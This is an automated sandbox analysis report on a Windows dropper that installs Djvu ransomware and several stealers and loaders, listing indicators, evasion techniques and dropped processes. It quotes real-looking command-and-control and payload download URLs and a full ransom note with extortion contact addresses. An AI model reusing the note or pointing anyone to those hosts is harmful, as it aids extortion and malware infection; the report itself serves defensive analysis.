djvu | 7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92

Analysis

max time kernel
61s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
12-03-2022 20:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe
Size

6.6MB
MD5

82692b4ac9c42c8df7113a966caee1fb
SHA1

f79d4290c46293aade968665c7352dc51834f731
SHA256

7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92
SHA512

2783b057df7434d09c4c2c7c748d23cbc58be53e3c48e5815186f70d4cc2e9f3c42ce826b453fc00c495f785beaa0d34942e280f48806b376aab5fe258bcf26b

Score

10^/10

djvu onlylogger redline smokeloader socelars tofsee vidar 706 aspackv2 backdoor evasion infostealer loader persistence ransomware spyware stealer trojan vmprotect

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.wygexde.xyz/

Extracted

Family

smokeloader

Version

2020

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32

Extracted

Family

vidar

Version

39.4

Botnet

706

https://sergeevih43.tumblr.com/

Attributes

profile_id
706

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Signatures

Detected Djvu ransomware 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4380-328-0x0000000002260000-0x000000000237B000-memory.dmp	family_djvu
behavioral2/memory/3264-340-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3264-334-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3264-331-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3264-327-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rUNdlL32.eXe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 380 4728 rUNdlL32.eXe
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	380	4728	rUNdlL32.eXe

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5536-318-0x00000000003E0000-0x0000000000554000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4016-309-0x00000000020D0000-0x0000000002114000-memory.dmp	family_onlylogger
behavioral2/memory/4016-310-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/220-246-0x0000000004490000-0x000000000452D000-memory.dmp	family_vidar
behavioral2/memory/220-247-0x0000000000400000-0x0000000004424000-memory.dmp	family_vidar

ASPack v2.12-2.42 8 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS061FCEED\libstdc++-6.dll	aspack_v212_v242

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 64 IoCs

Processes:

Files.exeFile.exeFolder.exejg3_3uag.exeInstall.exeInfo.exepub2.exeFolder.exeKRSetp.exeInstallation.exeInstallations.exesetup_installer.exesetup_install.exejobiea_6.exejobiea_4.exedada.exejobiea_8.exejobiea_3.exejobiea_7.exejobiea_5.exeConhost.exejfiag3g_gg.exejfiag3g_gg.exefindstr.execVIy4rituaNtEpNWJqKPNPHL.exesuddH5hIb2rDpzUSpA1FpMSZ.exeVT2PIXW1wgHAS9i6fVjVrBut.exes3RGjQowmy9tsi_KzRTowd3J.exeX_e0JxI2soazC29IRwTT5vIJ.exeT0w69jYr5T1jBfusUCaLgwwg.exer3B7BZ5lDo896LaXsX5cuWj7.exevRPfrgXDptMBnWhqrzb0HFhU.exe2iE0SvnRU5CQlXD1qofCQpQI.exe_oKUftCc7iUfqhafMneKfQhA.exevY81tJMq9B74tqVndJfEBQxQ.exe5tYrw2SQyyjGcEN4Kt5_ngzk.exe5DZeDBSmrtFUl9Ym3FAaeeul.exeConhost.exeConhost.exenfBfyVfjmy40ULWMDaoroHlH.exeAp3fTbWpa3svPwCMhaadPEoj.exepeGbkODvxelnwNtmY6eemnEO.exe9uYvmaeBEH6gvZIhQjN6L0No.exe3W3Od_ijjAb9QWaB54N_TV_M.exevRPfrgXDptMBnWhqrzb0HFhU.exeRv764t34kUQRqKSTvYj_ZG2J.exeYt43QJbC7FRoiQ4VkKTLuXfx.exeriJfPK8RYtgCepoSeSvSZ92b.exeauTOpCcmRe0eIJg0kVVucw5x.exegi0H32RL1wDn3hyGmKY0P4_c.exewXl1yWok9CHI_U1l8eGGpvn8.exeg4Zaj7KeRLrVCt0hOHJt8faM.exeConhost.exeCgWEgIdrDzNYkDTj8tw9sKU2.exeq8D6DkBbMl11Y04sW2B1zzBt.exeLvuvO4B0XnXvCbMohB4tgU9X.exeOkF30DvYHWDzcvKcVLtIVd21.exekyDnpx9K56qJDlFrxh4BpE9A.exe1OKDPJs_l9MDHwDqiC8oNOAj.exejobiea_7.exeopp2R9ZNSPkmXkDT5Xp1p6i4.exePLnP08u9SyqHTeB1eh_bDeaR.exeWerFault.exeConhost.exe

pid	process
3732	Files.exe
4220	File.exe
4848	Folder.exe
4812	jg3_3uag.exe
1560	Install.exe
2408	Info.exe
3084	pub2.exe
4780	Folder.exe
3432	KRSetp.exe
3700	Installation.exe
2196	Installations.exe
4448	setup_installer.exe
2380	setup_install.exe
3108	jobiea_6.exe
4548	jobiea_4.exe
1468	dada.exe
3788	jobiea_8.exe
3576	jobiea_3.exe
3424	jobiea_7.exe
4744	jobiea_5.exe
220	Conhost.exe
5184	jfiag3g_gg.exe
6000	jfiag3g_gg.exe
4328	findstr.exe
4016	cVIy4rituaNtEpNWJqKPNPHL.exe
3604	suddH5hIb2rDpzUSpA1FpMSZ.exe
3416	VT2PIXW1wgHAS9i6fVjVrBut.exe
3000	s3RGjQowmy9tsi_KzRTowd3J.exe
3872	X_e0JxI2soazC29IRwTT5vIJ.exe
4644	T0w69jYr5T1jBfusUCaLgwwg.exe
3480	r3B7BZ5lDo896LaXsX5cuWj7.exe
4380	vRPfrgXDptMBnWhqrzb0HFhU.exe
2992	2iE0SvnRU5CQlXD1qofCQpQI.exe
4036	_oKUftCc7iUfqhafMneKfQhA.exe
5636	vY81tJMq9B74tqVndJfEBQxQ.exe
3068	5tYrw2SQyyjGcEN4Kt5_ngzk.exe
4832	5DZeDBSmrtFUl9Ym3FAaeeul.exe
1636	Conhost.exe
1484	Conhost.exe
4468	nfBfyVfjmy40ULWMDaoroHlH.exe
5536	Ap3fTbWpa3svPwCMhaadPEoj.exe
5704	peGbkODvxelnwNtmY6eemnEO.exe
6032	9uYvmaeBEH6gvZIhQjN6L0No.exe
6012	3W3Od_ijjAb9QWaB54N_TV_M.exe
3264	vRPfrgXDptMBnWhqrzb0HFhU.exe
1860	Rv764t34kUQRqKSTvYj_ZG2J.exe
3152	Yt43QJbC7FRoiQ4VkKTLuXfx.exe
4524	riJfPK8RYtgCepoSeSvSZ92b.exe
5500	auTOpCcmRe0eIJg0kVVucw5x.exe
2684	gi0H32RL1wDn3hyGmKY0P4_c.exe
1268	wXl1yWok9CHI_U1l8eGGpvn8.exe
3272	g4Zaj7KeRLrVCt0hOHJt8faM.exe
5860	Conhost.exe
1580	CgWEgIdrDzNYkDTj8tw9sKU2.exe
4616	q8D6DkBbMl11Y04sW2B1zzBt.exe
5504	LvuvO4B0XnXvCbMohB4tgU9X.exe
1628	OkF30DvYHWDzcvKcVLtIVd21.exe
3900	kyDnpx9K56qJDlFrxh4BpE9A.exe
6152	1OKDPJs_l9MDHwDqiC8oNOAj.exe
4640	jobiea_7.exe
6312	opp2R9ZNSPkmXkDT5Xp1p6i4.exe
6324	PLnP08u9SyqHTeB1eh_bDeaR.exe
6388	WerFault.exe
6424	Conhost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe	vmprotect
behavioral2/memory/4812-144-0x0000000000400000-0x0000000000651000-memory.dmp	vmprotect

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

9uYvmaeBEH6gvZIhQjN6L0No.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9uYvmaeBEH6gvZIhQjN6L0No.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9uYvmaeBEH6gvZIhQjN6L0No.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Folder.exeInstallations.execmd.exeInfo.exesuddH5hIb2rDpzUSpA1FpMSZ.exe7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exeFiles.exeInstallation.exesetup_installer.exejobiea_6.exeOkF30DvYHWDzcvKcVLtIVd21.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Folder.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Installations.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Info.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	suddH5hIb2rDpzUSpA1FpMSZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	7968c93e70cf28156411c937a568e5f62431a4ce2b0e2f92f24a492d8e452a92.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Files.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Installation.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	jobiea_6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	OkF30DvYHWDzcvKcVLtIVd21.exe

Loads dropped DLL 10 IoCs

Processes:

pub2.exerundll32.exesetup_install.exedada.exe

pid	process
3084	pub2.exe
404	rundll32.exe
2380	setup_install.exe
2380	setup_install.exe
2380	setup_install.exe
2380	setup_install.exe
2380	setup_install.exe
2380	setup_install.exe
2380	setup_install.exe
1468	dada.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

9uYvmaeBEH6gvZIhQjN6L0No.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	9uYvmaeBEH6gvZIhQjN6L0No.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

41 ip-api.com
369 ipinfo.io
25 ipinfo.io
40 ipinfo.io
344 ipinfo.io
345 ipinfo.io
350 ipinfo.io
370 ipinfo.io
406 ipinfo.io
407 ipinfo.io
24 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

flow	ioc
41	ip-api.com
369	ipinfo.io
25	ipinfo.io
40	ipinfo.io
344	ipinfo.io
345	ipinfo.io
350	ipinfo.io
370	ipinfo.io
406	ipinfo.io
407	ipinfo.io
24	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

s3RGjQowmy9tsi_KzRTowd3J.exeAp3fTbWpa3svPwCMhaadPEoj.exeCgWEgIdrDzNYkDTj8tw9sKU2.exeg4Zaj7KeRLrVCt0hOHJt8faM.exe

pid process

3000 s3RGjQowmy9tsi_KzRTowd3J.exe
5536 Ap3fTbWpa3svPwCMhaadPEoj.exe
1580 CgWEgIdrDzNYkDTj8tw9sKU2.exe
3272 g4Zaj7KeRLrVCt0hOHJt8faM.exe

pid	process
3000	s3RGjQowmy9tsi_KzRTowd3J.exe
5536	Ap3fTbWpa3svPwCMhaadPEoj.exe
1580	CgWEgIdrDzNYkDTj8tw9sKU2.exe
3272	g4Zaj7KeRLrVCt0hOHJt8faM.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

vRPfrgXDptMBnWhqrzb0HFhU.exejobiea_7.exe5DZeDBSmrtFUl9Ym3FAaeeul.exe

description	pid	process	target process
PID 4380 set thread context of 3264	4380	vRPfrgXDptMBnWhqrzb0HFhU.exe	vRPfrgXDptMBnWhqrzb0HFhU.exe
PID 3424 set thread context of 4640	3424	jobiea_7.exe	jobiea_7.exe
PID 4832 set thread context of 6576	4832	5DZeDBSmrtFUl9Ym3FAaeeul.exe	reg.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 31 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2676	404	WerFault.exe	rundll32.exe
5844	220	WerFault.exe	jobiea_1.exe
3248	3872	WerFault.exe	X_e0JxI2soazC29IRwTT5vIJ.exe
2300	3480	WerFault.exe	r3B7BZ5lDo896LaXsX5cuWj7.exe
1884	4016	WerFault.exe	cVIy4rituaNtEpNWJqKPNPHL.exe
3208	4644	WerFault.exe	T0w69jYr5T1jBfusUCaLgwwg.exe
5472	4524	WerFault.exe	riJfPK8RYtgCepoSeSvSZ92b.exe
812	6152	WerFault.exe	1OKDPJs_l9MDHwDqiC8oNOAj.exe
6808	4644	WerFault.exe	T0w69jYr5T1jBfusUCaLgwwg.exe
4404	3480	WerFault.exe	r3B7BZ5lDo896LaXsX5cuWj7.exe
5436	6152	WerFault.exe	1OKDPJs_l9MDHwDqiC8oNOAj.exe
6468	3900	WerFault.exe	kyDnpx9K56qJDlFrxh4BpE9A.exe
5396	4016	WerFault.exe	cVIy4rituaNtEpNWJqKPNPHL.exe
2064	5504	WerFault.exe	LvuvO4B0XnXvCbMohB4tgU9X.exe
4136	1420	WerFault.exe	q8D6DkBbMl11Y04sW2B1zzBt.exe
2200	3900	WerFault.exe	kyDnpx9K56qJDlFrxh4BpE9A.exe
5196	4016	WerFault.exe	cVIy4rituaNtEpNWJqKPNPHL.exe
5556	6012	WerFault.exe	3W3Od_ijjAb9QWaB54N_TV_M.exe
980	6548	WerFault.exe	ppSQsan3QP16eGWdznQttzcA.exe
6304	5860	WerFault.exe	RqwrtQz1RwMfEq3gm4kbp_br.exe
3704	3900	WerFault.exe	kyDnpx9K56qJDlFrxh4BpE9A.exe
2980	3416	WerFault.exe	VT2PIXW1wgHAS9i6fVjVrBut.exe
6792	4016	WerFault.exe	cVIy4rituaNtEpNWJqKPNPHL.exe
6956	5860	WerFault.exe	RqwrtQz1RwMfEq3gm4kbp_br.exe
4100	3416	WerFault.exe	VT2PIXW1wgHAS9i6fVjVrBut.exe
4000	4016	WerFault.exe	cVIy4rituaNtEpNWJqKPNPHL.exe
6688	5220	WerFault.exe	lxgzpptk.exe
6868	3416	WerFault.exe	VT2PIXW1wgHAS9i6fVjVrBut.exe
6648	4680	WerFault.exe	fratjjne.exe
4228	3416	WerFault.exe	VT2PIXW1wgHAS9i6fVjVrBut.exe
6280	3416	WerFault.exe	VT2PIXW1wgHAS9i6fVjVrBut.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

dada.exepub2.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dada.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dada.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	dada.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1548 schtasks.exe
1444 schtasks.exe
5832 schtasks.exe
4696 schtasks.exe
4288 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

6180 timeout.exe
6820 timeout.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

4844 tasklist.exe
212 tasklist.exe
6876 tasklist.exe
2068 tasklist.exe

pid	process
1548	schtasks.exe
1444	schtasks.exe
5832	schtasks.exe
4696	schtasks.exe
4288	schtasks.exe

pid	process
6180	timeout.exe
6820	timeout.exe

pid	process
4844	tasklist.exe
212	tasklist.exe
6876	tasklist.exe
2068	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

5696 taskkill.exe
4032 taskkill.exe
1084 taskkill.exe
3100 taskkill.exe

pid	process
5696	taskkill.exe
4032	taskkill.exe
1084	taskkill.exe
3100	taskkill.exe

Modifies registry class 4 IoCs

Processes:

msedge.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\
Key created	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

960 PING.EXE

pid	process
960	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exeWerFault.exemsedge.exemsedge.exedada.exe

pid	process
3084	pub2.exe
3084	pub2.exe
2180
2180
2180
2180
2180
2180
1764	WerFault.exe
1764	WerFault.exe
1996	msedge.exe
1996	msedge.exe
2180
2180
4052	msedge.exe
4052	msedge.exe
2180
2180
2180
2180
1468	dada.exe
1468	dada.exe
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180
2180

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

pub2.exedada.exe

pid process

3084 pub2.exe
1468 dada.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

3696 msedge.exe
3696 msedge.exe
3696 msedge.exe
3696 msedge.exe
3696 msedge.exe
3696 msedge.exe

pid	process
3696	msedge.exe
3696	msedge.exe
3696	msedge.exe
3696	msedge.exe
3696	msedge.exe
3696	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Install.exeKRSetp.exetaskkill.exejobiea_5.exe

description	pid	process
Token: SeCreateTokenPrivilege	1560	Install.exe
Token: SeAssignPrimaryTokenPrivilege	1560	Install.exe
Token: SeLockMemoryPrivilege	1560	Install.exe
Token: SeIncreaseQuotaPrivilege	1560	Install.exe
Token: SeMachineAccountPrivilege	1560	Install.exe
Token: SeTcbPrivilege	1560	Install.exe
Token: SeSecurityPrivilege	1560	Install.exe
Token: SeTakeOwnershipPrivilege	1560	Install.exe
Token: SeLoadDriverPrivilege	1560	Install.exe
Token: SeSystemProfilePrivilege	1560	Install.exe
Token: SeSystemtimePrivilege	1560	Install.exe
Token: SeProfSingleProcessPrivilege	1560	Install.exe
Token: SeIncBasePriorityPrivilege	1560	Install.exe
Token: SeCreatePagefilePrivilege	1560	Install.exe
Token: SeCreatePermanentPrivilege	1560	Install.exe
Token: SeBackupPrivilege	1560	Install.exe
Token: SeRestorePrivilege	1560	Install.exe
Token: SeShutdownPrivilege	1560	Install.exe
Token: SeDebugPrivilege	1560	Install.exe
Token: SeAuditPrivilege	1560	Install.exe
Token: SeSystemEnvironmentPrivilege	1560	Install.exe
Token: SeChangeNotifyPrivilege	1560	Install.exe
Token: SeRemoteShutdownPrivilege	1560	Install.exe
Token: SeUndockPrivilege	1560	Install.exe
Token: SeSyncAgentPrivilege	1560	Install.exe
Token: SeEnableDelegationPrivilege	1560	Install.exe
Token: SeManageVolumePrivilege	1560	Install.exe
Token: SeImpersonatePrivilege	1560	Install.exe
Token: SeCreateGlobalPrivilege	1560	Install.exe
Token: 31	1560	Install.exe
Token: 32	1560	Install.exe
Token: 33	1560	Install.exe
Token: 34	1560	Install.exe
Token: 35	1560	Install.exe
Token: SeDebugPrivilege	3432	KRSetp.exe
Token: SeDebugPrivilege	3100	taskkill.exe
Token: SeDebugPrivilege	4744	jobiea_5.exe
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180
Token: SeCreatePagefilePrivilege	2180
Token: SeShutdownPrivilege	2180

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

File.exemsedge.exe

pid process

4220 File.exe
4220 File.exe
4220 File.exe
4220 File.exe
2180
2180
3696 msedge.exe
2180
3696 msedge.exe
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

File.exe

pid process

4220 File.exe
4220 File.exe
4220 File.exe
4220 File.exe

pid	process
4220	File.exe
4220	File.exe
4220	File.exe
4220	File.exe
2180
2180
3696	msedge.exe
2180
3696	msedge.exe

pid	process
4220	File.exe
4220	File.exe
4220	File.exe
4220	File.exe

Suspicious use of SetWindowsHookEx 19 IoCs

Processes:

Info.execVIy4rituaNtEpNWJqKPNPHL.exesuddH5hIb2rDpzUSpA1FpMSZ.exeVT2PIXW1wgHAS9i6fVjVrBut.exes3RGjQowmy9tsi_KzRTowd3J.exevRPfrgXDptMBnWhqrzb0HFhU.exeX_e0JxI2soazC29IRwTT5vIJ.exe_oKUftCc7iUfqhafMneKfQhA.exeT0w69jYr5T1jBfusUCaLgwwg.exer3B7BZ5lDo896LaXsX5cuWj7.exenfBfyVfjmy40ULWMDaoroHlH.exeAp3fTbWpa3svPwCMhaadPEoj.exe5tYrw2SQyyjGcEN4Kt5_ngzk.exe3W3Od_ijjAb9QWaB54N_TV_M.exeConhost.exe9uYvmaeBEH6gvZIhQjN6L0No.exeConhost.exevRPfrgXDptMBnWhqrzb0HFhU.exeInstall.exe

pid	process
2408	Info.exe
4016	cVIy4rituaNtEpNWJqKPNPHL.exe
3604	suddH5hIb2rDpzUSpA1FpMSZ.exe
3416	VT2PIXW1wgHAS9i6fVjVrBut.exe
3000	s3RGjQowmy9tsi_KzRTowd3J.exe
4380	vRPfrgXDptMBnWhqrzb0HFhU.exe
3872	X_e0JxI2soazC29IRwTT5vIJ.exe
4036	_oKUftCc7iUfqhafMneKfQhA.exe
4644	T0w69jYr5T1jBfusUCaLgwwg.exe
3480	r3B7BZ5lDo896LaXsX5cuWj7.exe
4468	nfBfyVfjmy40ULWMDaoroHlH.exe
5536	Ap3fTbWpa3svPwCMhaadPEoj.exe
3068	5tYrw2SQyyjGcEN4Kt5_ngzk.exe
6012	3W3Od_ijjAb9QWaB54N_TV_M.exe
1636	Conhost.exe
6032	9uYvmaeBEH6gvZIhQjN6L0No.exe
1484	Conhost.exe
3264	vRPfrgXDptMBnWhqrzb0HFhU.exe
6768	Install.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

